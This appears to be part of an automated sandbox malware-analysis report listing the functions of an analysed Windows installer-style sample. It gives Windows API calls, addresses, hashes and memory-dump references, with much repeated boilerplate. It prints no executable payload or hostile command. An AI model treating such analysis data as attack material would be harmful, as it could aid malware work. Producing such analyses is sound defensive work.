Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 0040611F Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
Instruction ID: 264fbd039af9554c7d5279b05a8ebe462d94e5569cecf838bb527c95a897585a
Opcode Fuzzy Hash: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
Instruction Fuzzy Hash: FEE0DF72700100EBE710DFA4DE48EAB33A8DF40368B30823AF611B60D1E6B499419B3D

Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8

Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4

Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745

Function 004060F1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,: Completed,?), ref: 00406115

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
Instruction ID: b9fbdb96d3617381fc4168e6aeef7157df6c2fc4641ee643fe61426fbe6ebd08
Opcode Fuzzy Hash: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
Instruction Fuzzy Hash: 69D01232B04100DBDB10DBA4AF4899E73A49B44369B304677E502F11D0D6B9D9515A29

Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C

Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19

Function 004058B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 004058BF

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69

Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Part of subcall function 0040586D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
Part of subcall function 0040586D: CloseHandle.KERNEL32(?), ref: 004058A3

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D

Part of subcall function 0040670F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406720
Part of subcall function 0040670F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406742

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
Instruction ID: 3becab0f16e6f8309876834f620f7dc234fcc10e550b4e4e61bdbb7a81e04ee7
Opcode Fuzzy Hash: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
Instruction Fuzzy Hash: 3EF09632905011DBCB20FBA1894459F76A49F00318B2445BBF902B21D1C77D0E519A6E

Non-executed Functions

Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C80
GetDlgItem.USER32(?,00000408), ref: 00404C8B
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
LoadBitmapW.USER32(0000006E), ref: 00404CE8
SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
DeleteObject.GDI32(00000000), ref: 00404D5E
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
GetWindowLongW.USER32(?,000000F0), ref: 00404E99
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
ShowWindow.USER32(?,00000005), ref: 00404EB8
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
ImageList_Destroy.COMCTL32(?), ref: 00405088
GlobalFree.KERNEL32(?), ref: 00405098
